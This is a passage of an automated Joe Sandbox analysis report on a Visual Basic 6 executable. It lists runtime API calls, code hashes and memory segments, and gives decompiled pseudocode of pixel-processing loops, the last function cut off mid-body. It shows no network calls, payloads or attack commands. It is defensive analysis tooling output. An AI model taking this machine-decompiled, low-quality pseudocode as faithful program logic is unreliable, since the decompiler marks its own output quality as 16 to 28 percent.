Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$CheckFreeHresult
String ID:
API String ID: 444973724-0
Opcode ID: 8cd4442b283de001ad8cd6ab99bb32def807896e6fb999f99971e1568decdee3
Instruction ID: fc78fc769a5f47acf92aac78fed33f1d9ea69d3ce20d7c9e0a9235c4b1148392
Opcode Fuzzy Hash: 8cd4442b283de001ad8cd6ab99bb32def807896e6fb999f99971e1568decdee3
Instruction Fuzzy Hash: 27512C71600205ABD710AF65CD49FAFBBBCFF49701F204529F542F72E1CA74A9468AA8

Uniqueness

Uniqueness Score: -1.00%

Function 00454080, Relevance: 27.2, APIs: 18, Instructions: 161COMMON

Download Yara Rule

APIs

__vbaObjSet.MSVBVM60(00000000,00000000), ref: 004540DB
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,0000012C), ref: 004540FC
__vbaFreeObj.MSVBVM60 ref: 00454105
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 00454119
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C), ref: 00454134
__vbaFreeObj.MSVBVM60 ref: 0045413D
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 00454151
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C), ref: 0045416C
__vbaFreeObj.MSVBVM60 ref: 00454175
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 00454189
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C), ref: 004541A4
__vbaFreeObj.MSVBVM60 ref: 004541AD
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 004541C1
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C), ref: 004541DC
__vbaFreeObj.MSVBVM60 ref: 004541EB
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 004541FB
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C), ref: 00454216
__vbaFreeObj.MSVBVM60 ref: 0045421F

Memory Dump Source

Source File: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$CheckFreeHresult
String ID:
API String ID: 444973724-0
Opcode ID: b806d0e59408ea6c3b327c82fd4acb167d1ffc4dbd70304f2753ebd4c0469428
Instruction ID: 5c3b0654e20942eacec06fd4e88b0da1b19119a274db94896b897d26772e3d54
Opcode Fuzzy Hash: b806d0e59408ea6c3b327c82fd4acb167d1ffc4dbd70304f2753ebd4c0469428
Instruction Fuzzy Hash: 6B514D71600205ABD700AFA5CD49FAFBBBCFF59705F204129F542E71E1CB7499468BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00453EA0, Relevance: 27.2, APIs: 18, Instructions: 161COMMON

Download Yara Rule

APIs

__vbaObjSet.MSVBVM60(00000000,00000000), ref: 00453EFB
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,0000012C), ref: 00453F1C
__vbaFreeObj.MSVBVM60 ref: 00453F25
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 00453F39
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C), ref: 00453F54
__vbaFreeObj.MSVBVM60 ref: 00453F5D
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 00453F71
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C), ref: 00453F8C
__vbaFreeObj.MSVBVM60 ref: 00453F95
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 00453FA9
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C), ref: 00453FC4
__vbaFreeObj.MSVBVM60 ref: 00453FCD
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 00453FE1
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C), ref: 00453FFC
__vbaFreeObj.MSVBVM60 ref: 0045400B
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 0045401B
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C), ref: 00454036
__vbaFreeObj.MSVBVM60 ref: 0045403F

Memory Dump Source

Source File: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$CheckFreeHresult
String ID:
API String ID: 444973724-0
Opcode ID: 4d9d3beba3e57d805a6bb401576b1e87447c5ad59da6bf3fdc45691a1ac6def1
Instruction ID: bc6a06ea76b04e8940415f99a81f743131d53584c91c556bedb541c73343f830
Opcode Fuzzy Hash: 4d9d3beba3e57d805a6bb401576b1e87447c5ad59da6bf3fdc45691a1ac6def1
Instruction Fuzzy Hash: 38512E71600205ABD710AF65CD49FAFBBBCFF49B05F204129F542E71E1CB7499468AA8

Uniqueness

Uniqueness Score: -1.00%

Function 00451470, Relevance: 25.7, APIs: 17, Instructions: 234
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E00451470(void* __ebx, void* __edi, void* __esi, intOrPtr __fp0, signed int _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v64;
				intOrPtr _v84;
				intOrPtr _v92;
				signed int _v104;
				void* _t65;
				void* _t67;
				void* _t73;
				intOrPtr _t74;
				signed int _t75;
				void* _t83;
				intOrPtr* _t86;
				void* _t88;
				signed int _t89;
				signed int _t91;
				signed int _t97;
				intOrPtr* _t98;
				void* _t100;
				intOrPtr _t101;
				signed int _t106;
				intOrPtr* _t107;
				signed int _t108;
				signed int _t110;
				intOrPtr _t117;
				intOrPtr _t118;
				signed int _t123;
				intOrPtr _t126;
				signed int _t129;
				signed int _t132;
				intOrPtr _t134;
				intOrPtr _t136;
				intOrPtr* _t138;
				intOrPtr* _t142;
				signed int _t145;
				signed int _t146;
				signed int _t150;
				intOrPtr* _t153;
				intOrPtr* _t154;
				intOrPtr* _t155;
				signed int _t157;
				intOrPtr* _t158;
				signed int _t160;
				signed int _t161;
				void* _t162;
				void* _t164;
				intOrPtr _t165;
				intOrPtr* _t166;
				intOrPtr _t178;

				_t178 = __fp0;
				_t165 = _t164 - 0xc;
				 *[fs:0x0] = _t165;
				_t166 = _t165 - 0x50;
				_v16 = _t166;
				_v12 = 0x401448;
				_t160 = _a4;
				_v8 = _t160 & 0x00000001;
				_t161 = _t160 & 0xfffffffe;
				_a4 = _t161;
				 *((intOrPtr*)( *_t161 + 4))(_t161, __edi, __esi, __ebx,  *[fs:0x0], 0x401e96, _t162);
				_t106 = 0;
				_v28 = 0;
				_v44 = 0;
				_v64 = 0;
				E00461600(0, __edi, _t161);
				_t136 =  *0x46c070; // 0x0
				 *0x46c068 = 0;
				_v84 = _t136;
				while(1) {
					_t110 =  *0x46c068; // 0x0
					if(_t110 > _v84) {
						break;
					}
					_t117 =  *0x46c074; // 0x0
					 *0x46c06c = _t106;
					_v92 = _t117;
					while(1) {
						_t74 =  *0x46c06c; // 0x0
						if(_t74 > _v92) {
							break;
						}
						_t86 =  *((intOrPtr*)( *_t161 + 0x334))(_t161);
						__imp____vbaObjSet( &_v28, _t86);
						_t155 = _t86;
						_t88 =  *((intOrPtr*)( *_t155 + 0xe0))(_t155,  &_v64);
						asm("fclex");
						if(_t88 < _t106) {
							__imp____vbaHresultCheckObj(_t88, _t155, 0x40937c, 0xe0);
						}
						_t126 =  *0x46c06c; // 0x0
						_t145 =  *0x46c068; // 0x0
						_t89 = _v64;
						E00408D5C();
						__imp____vbaSetSystemError(_t89, _t145, _t126);
						 *0x46c084 = _t89;
						__imp____vbaFreeObj();
						_t157 =  *0x46c084; // 0x0
						_t91 = _t157 & 0x800000ff;
						if(_t91 < 0) {
							_t91 = (_t91 - 0x00000001 | 0xffffff00) + 1;
						}
						_t108 = _t91;
						asm("cdq");
						_t146 = _t145 & 0x000000ff;
						 *0x46c078 = _t108;
						asm("cdq");
						asm("cdq");
						_t129 = _t91 + _t146 >> 8;
						_t97 = (_t157 + (_t146 & 0x000000ff) >> 8) + (_t146 & 0xff) >> 8;
						 *0x46c07c = _t129;
						 *0x46c080 = _t97;
						if(_t108 >= 0xc8 || _t129 >= 0xc8) {
							L11:
							 *0x46c084 = 0xffffff;
							goto L12;
						} else {
							 *0x46c084 = 0;
							if(_t97 < 0xc8) {
								L12:
								_t98 =  *((intOrPtr*)( *_t161 + 0x334))(_t161);
								__imp____vbaObjSet( &_v28, _t98);
								_t158 = _t98;
								_t100 =  *((intOrPtr*)( *_t158 + 0xe0))(_t158,  &_v64);
								asm("fclex");
								if(_t100 < 0) {
									__imp____vbaHresultCheckObj(_t100, _t158, 0x40937c, 0xe0);
								}
								_t150 =  *0x46c084; // 0x0
								_t101 =  *0x46c06c; // 0x0
								_t132 =  *0x46c068; // 0x0
								E00408D18();
								__imp____vbaSetSystemError(_v64, _t132, _t101, _t150);
								__imp____vbaFreeObj();
								_t134 =  *0x46c06c; // 0x0
								_t106 = 0;
								 *0x46c06c = _t134 + 1;
								continue;
							}
							goto L11;
						}
					}
					_t75 =  *0x46c068; // 0x0
					_t118 =  *0x46c070; // 0x0
					_t166 = _t166 - 0x10;
					asm("cdq");
					_t142 = _t166;
					_v104 = (_t75 + _t75 * 4 + (_t75 + _t75 * 4) * 4 << 2) / (_t118 - 1);
					asm("fild dword [ebp-0x64]");
					 *_t142 = 4;
					_v36 = _t178;
					 *((intOrPtr*)(_t142 + 4)) = _v40;
					 *((intOrPtr*)(_t142 + 8)) = _v36;
					 *((intOrPtr*)(_t142 + 0xc)) = _v32;
					_t83 =  *((intOrPtr*)( *_t161 + 0x488))(_t161, 5);
					__imp____vbaObjSet( &_v28, _t83);
					__imp____vbaLateIdSt(_t83);
					__imp____vbaFreeObj();
					_t123 =  *0x46c068; // 0x0
					 *0x46c068 = _t123 + 1;
				}
				_t65 =  *((intOrPtr*)( *_t161 + 0x334))(_t161);
				_t107 = __imp____vbaObjSet;
				_t153 =  *_t107( &_v28, _t65);
				_t67 =  *((intOrPtr*)( *_t153 + 0x264))(_t153);
				asm("fclex");
				if(_t67 < 0) {
					__imp____vbaHresultCheckObj(_t67, _t153, 0x40937c, 0x264);
				}
				_t154 = __imp____vbaFreeObj;
				 *_t154();
				_t138 = _t166 - 0x10;
				 *_t138 = 4;
				 *((intOrPtr*)(_t138 + 4)) = _v40;
				 *((intOrPtr*)(_t138 + 8)) = 0;
				 *((intOrPtr*)(_t138 + 0xc)) = _v32;
				__imp____vbaLateIdSt( *_t107( &_v28,  *((intOrPtr*)( *_t161 + 0x488))(_t161, 5)));
				_t73 =  *_t154();
				_v8 = 0;
				asm("wait");
				_push(0x45177b);
				return _t73;
			}

0x00451470
0x00451473
0x00451482
0x00451489
0x0045148f
0x00451492
0x00451499
0x004514a1
0x004514a4
0x004514a8
0x004514ad
0x004514b0
0x004514b2
0x004514b5
0x004514b8
0x004514bb
0x004514c0
0x004514c6
0x004514cc
0x004514cf
0x004514d2
0x004514da
0x00000000
0x00000000
0x004514e0
0x004514e6
0x004514ec
0x004514ef
0x004514f2
0x004514f9
0x00000000
0x00000000
0x00451502
0x0045150d
0x00451513
0x0045151c
0x00451524
0x00451526
0x00451534
0x00451534
0x0045153a
0x00451540
0x00451546
0x0045154c
0x00451553
0x0045155c
0x00451562
0x00451568
0x00451570
0x00451575
0x0045157d
0x0045157d
0x0045157e
0x00451580
0x00451581
0x00451587
0x00451593
0x0045159f
0x004515a8
0x004515ab
0x004515b4
0x004515ba
0x004515bf
0x004515da
0x004515da
0x00000000
0x004515c9
0x004515ce
0x004515d8
0x004515e4
0x004515e7
0x004515f2
0x004515f8
0x00451601
0x00451609
0x0045160b
0x00451619
0x00451619
0x0045161f
0x00451625
0x0045162a
0x00451637
0x0045163c
0x00451645
0x0045164b
0x00451658
0x0045165a
0x00000000
0x0045165a
0x00000000
0x004515d8
0x004515bf
0x00451665
0x0045166a
0x00451670
0x0045167c
0x00451680
0x00451685
0x0045168d
0x00451690
0x00451695
0x0045169b
0x004516a1
0x004516a6
0x004516a9
0x004516b4
0x004516bb
0x004516c4
0x004516ca
0x004516d7
0x004516d7
0x004516e5
0x004516eb
0x004516f8
0x004516fd
0x00451705
0x00451707
0x00451715
0x00451715
0x0045171b
0x00451724
0x0045172e
0x00451735
0x0045173a
0x0045173f
0x00451745
0x00451756
0x0045175f
0x00451761
0x00451768
0x00451769
0x00000000

APIs

Part of subcall function 00461600: __vbaNew2.MSVBVM60(00405960,0046C010,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 0046164A
Part of subcall function 00461600: __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461669
Part of subcall function 00461600: __vbaNew2.MSVBVM60(00405960,0046C010,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461680
Part of subcall function 00461600: __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461699
Part of subcall function 00461600: __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000188,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004616BC
Part of subcall function 00461600: __vbaObjSet.MSVBVM60(?,?), ref: 004616D3
Part of subcall function 00461600: __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000064), ref: 004616E9
Part of subcall function 00461600: __vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 004616FD

__vbaObjSet.MSVBVM60(?,00000000), ref: 0045150D
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,000000E0), ref: 00451534
__vbaSetSystemError.MSVBVM60(?,00000000,00000000), ref: 00451553
__vbaFreeObj.MSVBVM60 ref: 00451562
__vbaObjSet.MSVBVM60(?,00000000), ref: 004515F2
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,000000E0), ref: 00451619
__vbaSetSystemError.MSVBVM60(?,00000000,00000000,00000000), ref: 0045163C
__vbaFreeObj.MSVBVM60 ref: 00451645
__vbaObjSet.MSVBVM60(?,00000000), ref: 004516B4
__vbaLateIdSt.MSVBVM60(00000000), ref: 004516BB
__vbaFreeObj.MSVBVM60 ref: 004516C4
__vbaObjSet.MSVBVM60(?,00000000), ref: 004516F6
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000264), ref: 00451715
__vbaFreeObj.MSVBVM60 ref: 00451724
__vbaObjSet.MSVBVM60(?,00000000), ref: 00451753
__vbaLateIdSt.MSVBVM60(00000000), ref: 00451756
__vbaFreeObj.MSVBVM60 ref: 0045175F

Memory Dump Source

Source File: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$Free$CheckHresult$ErrorLateNew2System$List
String ID:
API String ID: 937807144-0
Opcode ID: aa28d60223f53beaf94086324f21b9256b848c720d458898bc161f199b75e052
Instruction ID: b699f0896845c0c46b49775d89fc049436851090852ec73d4b4937481589ea56
Opcode Fuzzy Hash: aa28d60223f53beaf94086324f21b9256b848c720d458898bc161f199b75e052
Instruction Fuzzy Hash: BE919270A00205DFCB04DFA5DC84ABABBB5FB48701F14813EE945E72A1EB749845CF68

Uniqueness

Uniqueness Score: -1.00%

Function 0046ACD0, Relevance: 25.7, APIs: 17, Instructions: 188COMMON

Download Yara Rule

APIs

__vbaObjSet.MSVBVM60(?,00000000), ref: 0046AD38
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409314,000000F0), ref: 0046AD5B
__vbaFreeObj.MSVBVM60 ref: 0046AD6F
__vbaObjSet.MSVBVM60(?,00000000), ref: 0046AD8C
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409314,000000F0), ref: 0046ADAF
__vbaObjSet.MSVBVM60(?,00000000), ref: 0046ADC3
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409314,000000F8), ref: 0046ADEA
__vbaR4Str.MSVBVM60(?), ref: 0046ADF4
__vbaFreeStr.MSVBVM60 ref: 0046AE00
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0046AE16
_adj_fdiv_m64.MSVBVM60 ref: 0046AE41
__vbaNew2.MSVBVM60(00405960,0046C010), ref: 0046AE66
__vbaObjSet.MSVBVM60(?,00000000), ref: 0046AE7F
__vbaObjSet.MSVBVM60(?,00000000), ref: 0046AE8F
__vbaObjSet.MSVBVM60(?,?), ref: 0046AE9E
__vbaObjSet.MSVBVM60(?,?), ref: 0046AEAB

Part of subcall function 00462940: __vbaHresultCheckObj.MSVBVM60(00000000,?,0040937C,00000108,?,?), ref: 004629A1
Part of subcall function 00462940: __vbaFpI2.MSVBVM60(?,?), ref: 004629DA
Part of subcall function 00462940: __vbaHresultCheckObj.MSVBVM60(00000000,?,0040937C,00000110,?,?,?,?), ref: 00462A03
Part of subcall function 00462940: __vbaFpI2.MSVBVM60(?,?,?,?), ref: 00462A2E
Part of subcall function 00462940: __vbaHresultCheckObj.MSVBVM60(00000000,?,0040937C,00000108,?,?,?,?,?,?), ref: 00462A57
Part of subcall function 00462940: __vbaFpI2.MSVBVM60(?,?,?,?,?,?), ref: 00462A82

__vbaFreeObjList.MSVBVM60(00000004,?,?,?,?,?,?,?), ref: 0046AED0

Memory Dump Source

Source File: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$CheckHresult$Free$List$New2_adj_fdiv_m64
String ID:
API String ID: 841737202-0
Opcode ID: faaffb9f1557bb7712c4d05ddafab6c793c74fe3ba282f517f7a7be12bd633b5
Instruction ID: 4f9e2dd49250ce7e775398e52fec488730528b2c4e93d8241b4014d48ef8a52e
Opcode Fuzzy Hash: faaffb9f1557bb7712c4d05ddafab6c793c74fe3ba282f517f7a7be12bd633b5
Instruction Fuzzy Hash: 9A610B71900219AFDB14DFA4CD88EEEB7BCFF48704F14812AF541B71A1EB7899058B69

Uniqueness

Uniqueness Score: -1.00%

Function 0046A1F0, Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 89COMMON

Download Yara Rule

APIs

__vbaLenBstr.MSVBVM60(0046AFB6), ref: 0046A24B
__vbaStrCopy.MSVBVM60 ref: 0046A258
__vbaLenBstr.MSVBVM60(00000000), ref: 0046A26B
#619.MSVBVM60(?,00004008,-00000001), ref: 0046A277
__vbaStrVarMove.MSVBVM60(?), ref: 0046A281
__vbaStrMove.MSVBVM60 ref: 0046A28C
__vbaStrCopy.MSVBVM60 ref: 0046A296
__vbaFreeStr.MSVBVM60 ref: 0046A29F
__vbaFreeVar.MSVBVM60 ref: 0046A2A8
__vbaObjSet.MSVBVM60(?,00000000), ref: 0046A2BC
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040A714,000000A4), ref: 0046A2E2
__vbaFreeObj.MSVBVM60 ref: 0046A2EB

Strings

!SEK - Paint 2.0, Made by Stephan Kirchmaier in Y2K! Vote FOR it, please!! THANX! , xrefs: 0046A251

Memory Dump Source

Source File: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$Free$BstrCopyMove$#619CheckHresult
String ID: !SEK - Paint 2.0, Made by Stephan Kirchmaier in Y2K! Vote FOR it, please!! THANX!
API String ID: 3893257056-3111897467
Opcode ID: 30efbad99585c76d228f4af8ce358637128bc74558e828b41d084ae259fd5de5
Instruction ID: 40b4cf9f343e26247580b7494f8b95aadb0f69297d4b8f7fcde39f4d85986441
Opcode Fuzzy Hash: 30efbad99585c76d228f4af8ce358637128bc74558e828b41d084ae259fd5de5
Instruction Fuzzy Hash: 4A314075A00609EFCB00DFA4C948AAEBBB9FF58704F108129F915F72A0EB749905CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00462520, Relevance: 22.7, APIs: 15, Instructions: 153COMMON

Download Yara Rule

APIs

__vbaHresultCheckObj.MSVBVM60(00000000,660D9FF1,0040937C,00000148,?,00000000), ref: 00462569
__vbaHresultCheckObj.MSVBVM60(00000000,660D9FF1,0040937C,00000128,?,00000000), ref: 00462596
__vbaHresultCheckObj.MSVBVM60(00000000,660D9FF1,0040937C,0000014C,?,00000000), ref: 004625C0
__vbaHresultCheckObj.MSVBVM60(00000000,660D9FF1,0040937C,0000012C,?,00000000), ref: 004625E0
__vbaVarVargNofree.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,0044C9B2,?,0046C0C8), ref: 004625F9
__vbaR4Var.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,0044C9B2,?,0046C0C8), ref: 004625FC
__vbaVarVargNofree.MSVBVM60(?,?,00000000,?,?,?,?,?,?,?,?,?,?,0044C9B2,?,0046C0C8), ref: 0046260E
__vbaR4Var.MSVBVM60(00000000,?,?,00000000,?,?,?,?,?,?,?,?,?,?,0044C9B2,?), ref: 00462611
__vbaVarVargNofree.MSVBVM60(?,?,?,00000000,?,?,?,?,?,?,?,?,?,?,0044C9B2,?), ref: 00462623
__vbaR4Var.MSVBVM60(00000000,?,?,?,00000000,?,?,?,?,?,?,?,?,?,?,0044C9B2), ref: 00462626
__vbaVarVargNofree.MSVBVM60(?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,?,0044C9B2), ref: 00462638
__vbaR4Var.MSVBVM60(00000000,?,?,?,?,00000000), ref: 0046263B
__vbaHresultCheckObj.MSVBVM60(00000000,660DA274,0040937C,0000027C,?,?,?,?,?,00000000), ref: 0046266A
__vbaHresultCheckObj.MSVBVM60(00000000,6610728D,0040937C,0000014C,?,?,?,?,?,00000000), ref: 00462696
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040937C,0000012C,?,?,?,?,?,00000000), ref: 004626BA

Memory Dump Source

Source File: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$CheckHresult$NofreeVarg
String ID:
API String ID: 3363213433-0
Opcode ID: 962cc644fd0aea06be5ae27afe072eeba4a61b9c2064fbe6164a1be512a6e2cd
Instruction ID: 5f2a208101837dc700143b376b99203ee1777f6a565581a5d6dfc2516f7cce14
Opcode Fuzzy Hash: 962cc644fd0aea06be5ae27afe072eeba4a61b9c2064fbe6164a1be512a6e2cd
Instruction Fuzzy Hash: B5512C70604300ABC610EF66CD88D5BFBE8FF99B01F20492DF685A32A1D674E845CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00460BE0, Relevance: 21.2, APIs: 14, Instructions: 175COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(004095DC,0046C7C0,?,?), ref: 00460C69
__vbaHresultCheckObj.MSVBVM60(00000000,029E254C,004095CC,00000048), ref: 00460C9C
__vbaNew2.MSVBVM60(004095DC,0046C7C0), ref: 00460CB8
__vbaHresultCheckObj.MSVBVM60(00000000,029E254C,004095CC,00000048), ref: 00460CE5
__vbaI4Str.MSVBVM60(?), ref: 00460CF4
__vbaI4Str.MSVBVM60(?,00000000), ref: 00460CFE
__vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,00000000), ref: 00460D26

Memory Dump Source

Source File: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$CheckHresultNew2$FreeList
String ID:
API String ID: 1549294082-0
Opcode ID: 3229ded44fa887d0bf9ebc41ff90c153be8ca0868fdacbff093c81b3e9f26c83
Instruction ID: 5396d095641a4aa7e3873e8e655b6c27905bdc820fb18622de6364928ee85adc
Opcode Fuzzy Hash: 3229ded44fa887d0bf9ebc41ff90c153be8ca0868fdacbff093c81b3e9f26c83
Instruction Fuzzy Hash: 8A5109B1640219AFDB248B54CC85FEB7378EF04B00F004596F648B7190E7B89D84CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 0044CBA0, Relevance: 19.8, APIs: 13, Instructions: 258
COMMON

Download Yara Rule

C-Code - Quality: 28%

			E0044CBA0(void* __ebx, void* __edi, void* __esi, signed int _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v28;
				char _v32;
				signed int _v40;
				signed int _v48;
				signed int _v52;
				void* _t59;
				intOrPtr* _t61;
				void* _t62;
				signed int _t63;
				intOrPtr* _t65;
				void* _t66;
				void* _t71;
				signed int _t81;
				intOrPtr* _t101;
				intOrPtr* _t102;
				intOrPtr* _t103;
				intOrPtr* _t104;
				signed int _t106;
				signed int _t107;
				intOrPtr* _t108;
				void* _t109;
				void* _t111;
				intOrPtr _t112;
				char _t121;

				_t112 = _t111 - 0xc;
				 *[fs:0x0] = _t112;
				_v16 = _t112 - 0x34;
				_v12 = 0x401250;
				_t106 = _a4;
				_v8 = _t106 & 0x00000001;
				_t107 = _t106 & 0xfffffffe;
				_a4 = _t107;
				_t59 =  *((intOrPtr*)( *_t107 + 4))(_t107, __edi, __esi, __ebx,  *[fs:0x0], 0x401e96, _t109);
				_t81 = 0;
